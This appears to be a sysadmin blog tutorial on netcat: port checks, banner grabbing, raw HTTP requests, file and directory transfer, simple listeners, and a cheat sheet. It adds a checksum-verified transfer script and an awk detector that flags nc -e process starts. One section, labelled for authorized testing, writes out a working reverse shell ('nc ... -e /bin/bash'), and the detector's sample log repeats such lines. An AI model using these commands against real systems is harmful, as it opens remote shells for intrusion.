netcat network
the swiss army knife that IT forgot to lock up.
The netcat man page is short — about 200 lines. That’s because netcat does one simple thing: opens a network connection and sends data through it. What makes it powerful is that “send data through a network connection” turns out to be the foundation of almost everything.
You needed to check if a port was open. So you installed nmap. 25MB. You Googled “nmap check port” because the syntax isn’t obvious. You ran a scan. It took thirty seconds. It showed you a fancy table with “open” or “closed.” You felt like a hacker for about five seconds.
Or you needed to transfer a file between two machines on the same network. So you set up a temporary SAMBA share. Or you emailed it to yourself. Or you plugged in a USB drive like it was 2006.
netcat does both of those things — and a dozen others — with a single command. It’s been called “the Swiss army knife of networking” since the ’90s, and that name hasn’t stopped being accurate.
Unless you’re running Windows then wtf none of this applies to you. But hey, come to the dark side, go install WSL2 and you can follow along. We’ll wait. Impatiently.
If you’re lazy like me (all sysadmins are!) then skip ahead to the netcat cheat sheet at the bottom of this page.
Which netcat?
There are several implementations. The two most common:
- ncat (from nmap), command ncat: the modern, full-featured version
- OpenBSD netcat, command nc: ships with most Linux distros by default
Most examples on this page work with both. When there’s a difference, it’s noted. Check what you have:
nc -h 2>&1 | head -5
Check if a port is open
nc -zv 10.0.0.5 22
Connection to 10.0.0.5 22 port [tcp/ssh] succeeded!
-z means zero-I/O mode — just check the connection, don’t send data. -v makes it verbose so you see the result. Instant. No nmap. No install. No scan table.
Check multiple ports
nc -zv 10.0.0.5 20-25
Scans ports 20 through 25. Shows which are open and which refused.
Check a range of common ports
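for p in 22 80 443 3306 5432 8080; do nc -zv 10.0.0.5 "$p"; done
Specific ports. SSH, HTTP, HTTPS, MySQL, PostgreSQL, and a common dev server port. Done in under a second. The loop is there because OpenBSD nc takes one port or one range per run; traditional netcat also accepts the ports as a plain space-separated list.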
With a timeout
nc -zv -w 3 10.0.0.5 443
-w 3 sets a 3-second timeout. Without it, netcat might hang on filtered ports (firewalled but not rejecting) for a long time.
Test if a service is responding
HTTP
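printf 'GET / HTTP/1.1\r\nHost: example.com\r\nConnection: close\r\n\r\n' | nc example.com 80
Sends a raw HTTP request and shows the response. You can see headers, status codes, and the response body. Connection: close tells the server to hang up after answering, so nc exits instead of sitting on a keep-alive connection, and printf produces the \r\n line endings in any shell, where echo -e only works in some. For quick “is this web server alive and what is it returning” checks without a browser.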
SMTP
nc mail.example.com 25
Connects to a mail server. You’ll see the SMTP banner. You can manually send EHLO commands. For diagnosing mail delivery issues when you need to see exactly what the server says.
Transfer files (quick and dirty)
No SCP. No SFTP. No SAMBA share. No USB drive. Two machines, one network, one file.
On the receiving machine
nc -l -p 9999 > received_file.tar.gz
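Listens on port 9999 and writes whatever comes in to a file. Some builds of OpenBSD nc reject -p in combination with -l; on those, give the port directly: nc -l 9999.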
On the sending machine
nc 10.0.0.5 9999 < file_to_send.tar.gz
Sends the file to the receiving machine on port 9999. The file appears on the other end. Transfer complete.
This is not encrypted. Not authenticated. Not secured in any way. Use it on trusted networks for quick transfers. For anything else, use scp or rsync.
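Plain nc also gives no signal that a transfer arrived whole, so one inexpensive check is to frame the stream with its digest. This is an added example, not part of the original page; send_framed and recv_verified are hypothetical helper names, and sha256sum is assumed to be installed on both machines.

```shell
#!/bin/sh
# Added example: put a SHA-256 header in front of a netcat transfer so the
# receiver can tell a complete file from a truncated or corrupted one.
# Assumes sha256sum (GNU coreutils) is installed on both machines.

# Sender: emit "<64 hex digits>\n", then the raw file bytes.
send_framed() {
    [ -r "$1" ] || { echo "cannot read $1" >&2; return 1; }
    sha256sum < "$1" | cut -d' ' -f1
    cat < "$1"
}

# Receiver: read the header line, store the payload, compare digests.
# On mismatch the received file is deleted and the function returns 1.
recv_verified() {
    out=$1
    IFS= read -r expected || return 1
    case $expected in
        ''|*[!0-9a-f]*) echo "malformed header" >&2; return 1 ;;
    esac
    cat > "$out"
    actual=$(sha256sum < "$out" | cut -d' ' -f1)
    if [ "$actual" != "$expected" ]; then
        rm -f "$out"
        echo "digest mismatch, file discarded" >&2
        return 1
    fi
    echo "verified sha256=$actual"
}

# Over the network, with the port and address used on this page:
#   receiver:  nc -l -p 9999 | recv_verified received_file.tar.gz
#   sender:    send_framed file_to_send.tar.gz | nc 10.0.0.5 9999

# Local run: a pipe stands in for the nc connection (payload is constructed).
demo_transfer() {
    dir=$(mktemp -d) || return 1
    printf 'constructed payload\n' > "$dir/in"
    send_framed "$dir/in" | recv_verified "$dir/out"
    rc=$?
    rm -rf "$dir"
    return $rc
}
demo_transfer
```

A digest sent in the same stream catches truncation and corruption, not deliberate tampering, because anyone able to alter the payload can alter the header too. To cover that case, compare the printed sha256 with one the sender reads out over a different channel.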
Transfer a whole directory
# Receiver
nc -l -p 9999 | tar -xzf -
# Sender
tar -czf - /path/to/directory | nc 10.0.0.5 9999
Tar compresses on the fly, netcat ships it over the network, tar decompresses on the other end. One pipeline. No temporary files.
Chat between two machines
Machine 1 (listener)
nc -l -p 4444
Machine 2 (connector)
nc 10.0.0.5 4444
Type in either terminal and it appears on the other one. Two-way text chat over the network. It’s not Slack, but it works when nothing else is available and you need to communicate with someone on the same network.
Listen on a port (simple server)
nc -l -p 8080
Opens port 8080 and waits for a connection. Whatever the client sends, you see in your terminal. Whatever you type, the client receives. This is the foundation of everything else netcat does — it’s just “open a port and pipe data.”
Respond with a message
echo "Server is alive" | nc -l -p 8080
Anyone connecting to port 8080 gets “Server is alive” and the connection closes. A one-line health check endpoint. No web server required.
Keep listening (serve multiple connections)
while true; do echo "OK" | nc -l -p 8080; done
Re-opens the port after each connection. A persistent (if crude) service.
Banner grabbing (what’s running on that port?)
nc -v 10.0.0.5 22
SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6
Connect to a port and read the service banner. Now you know the SSH version, OS, and patch level. Works on any service that sends a banner — SSH, SMTP, FTP, MySQL.
echo "" | nc -v -w 3 10.0.0.5 3306
MySQL also sends a banner on connect. The version string tells you what you’re dealing with before you even authenticate.
Reverse shell (for authorized testing only)
This is a legitimate penetration testing technique. Only use on systems you’re authorized to test.
On your machine (listener)
nc -l -p 4444
On the target (sends shell back to you)
nc 10.0.0.5 4444 -e /bin/bash
The target machine sends a bash shell to your listener. You can type commands on your machine and they execute on the target. Note: -e is only available in ncat and the traditional netcat, not the OpenBSD version.
This is a core tool in penetration testing. If you’re in cybersecurity, you’ve used this or will use this. If you’re not, now you know what it looks like in your logs.
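What that looks like in logs, as an added detection example that is not part of the original page: the filter below flags netcat process starts that attach a program to the socket with -e (or ncat's long forms). The record format, the sample lines and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat process starts that bind a program to the socket.
# Assumed record format (constructed): "<time> <user> <argv...>", one per line.

# Constructed sample records, not real log data.
sample_exec_log() {
cat <<'EOF'
2024-05-01T10:00:01Z alice nc -zv 10.0.0.5 22
2024-05-01T10:02:13Z alice nc -l -p 9999
2024-05-01T10:05:40Z www-data nc 10.0.0.5 4444 -e /bin/bash
2024-05-01T10:06:02Z www-data /usr/bin/ncat --exec=/bin/sh 10.0.0.5 4444
2024-05-01T10:07:19Z bob /bin/nc.traditional -nve /bin/sh 10.0.0.5 4444
2024-05-01T10:08:55Z bob grep -e nc /etc/services
EOF
}

# Reads records on stdin, prints "ALERT exec=<program> | <record>" per hit.
flag_nc_exec() {
    awk '
    {
        n = split($3, parts, "/")          # basename of argv[0]
        if (parts[n] !~ /^(nc|ncat|netcat|nc\.traditional)$/) next
        for (i = 4; i <= NF; i++) {
            # -e alone or ending a short-option cluster (-nve), or ncat long forms
            if ($i ~ /^-[A-Za-z0-9]*e$/ || $i ~ /^--(exec|sh-exec)/) {
                eq = index($i, "=")
                if (eq > 0)      target = substr($i, eq + 1)
                else if (i < NF) target = $(i + 1)
                else             target = "?"
                print "ALERT exec=" target " | " $0
                next
            }
        }
    }'
}

sample_exec_log | flag_nc_exec
```

The match is on the program name, so a renamed binary passes it; treat this as one signal and pair it with a rule on the behaviour itself, such as a shell whose standard input is a network socket.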
The flags that actually matter
| Flag | What it does |
|---|---|
| -l | Listen mode — wait for incoming connections. |
| -p PORT | Specify the port to listen on or connect to. |
| -v | Verbose — show connection info. |
| -z | Zero-I/O — scan mode, just check if port is open. |
| -w SECS | Timeout after N seconds. |
| -u | Use UDP instead of TCP. |
| -e PROG | Execute a program on connection (ncat only). |
| -n | No DNS resolution — use IPs only. |
“But I use—”
Sure you do.
“nmap is better for port scanning.” nmap is a dedicated port scanner with OS detection, service versioning, script engines, and NSE scripts. It’s incredible for comprehensive scans. It’s also 25MB and overkill when you just want to check if port 443 is open. nc -zv answers that question in half a second without installing anything.
“I use telnet to test ports.” Telnet works. It also sends your credentials in cleartext, has been deprecated for decades, and isn’t installed by default on modern systems. netcat does everything telnet does plus file transfers, scanning, and scripting. It’s telnet’s cooler younger sibling who actually finished school.
“I use SCP/SFTP for file transfers.” As you should — for transfers that need encryption and authentication. netcat’s file transfer is for “I need to copy this 50MB file to the box next to me right now” situations where setting up keys isn’t worth the thirty seconds it takes.
“Ncat is better than nc.” Ncat adds SSL support, access control, and the -e flag. If you’re doing security work, use ncat. If you’re checking ports and doing quick transfers, plain nc is fine. Know both.
netcat cheat sheet
You made it. Or you skipped straight here. Either way, no judgment. Copy and paste these. Pin them. Tattoo them on your forearm. Whatever works.
| What you’re doing | Command |
|---|---|
| Check if a port is open | nc -zv host 22 |
| Scan a port range | nc -zv host 20-25 |
| Check with timeout | nc -zv -w 3 host 443 |
| Grab a service banner | nc -v host 22 |
| Listen on a port | nc -l -p 8080 |
| Send a file | nc host 9999 < file.tar.gz |
| Receive a file | nc -l -p 9999 > file.tar.gz |
| Transfer a directory | Sender: tar czf - dir \| nc host 9999; Receiver: nc -l -p 9999 \| tar xzf - |
| Raw HTTP request | printf 'GET / HTTP/1.1\r\nHost: host\r\nConnection: close\r\n\r\n' \| nc host 80 |
| Quick chat (listener) | nc -l -p 4444 |
| Quick chat (connector) | nc host 4444 |
The one command:
nc -zv host port
Is the port open? Yes or no. Faster than nmap, simpler than telnet, already installed.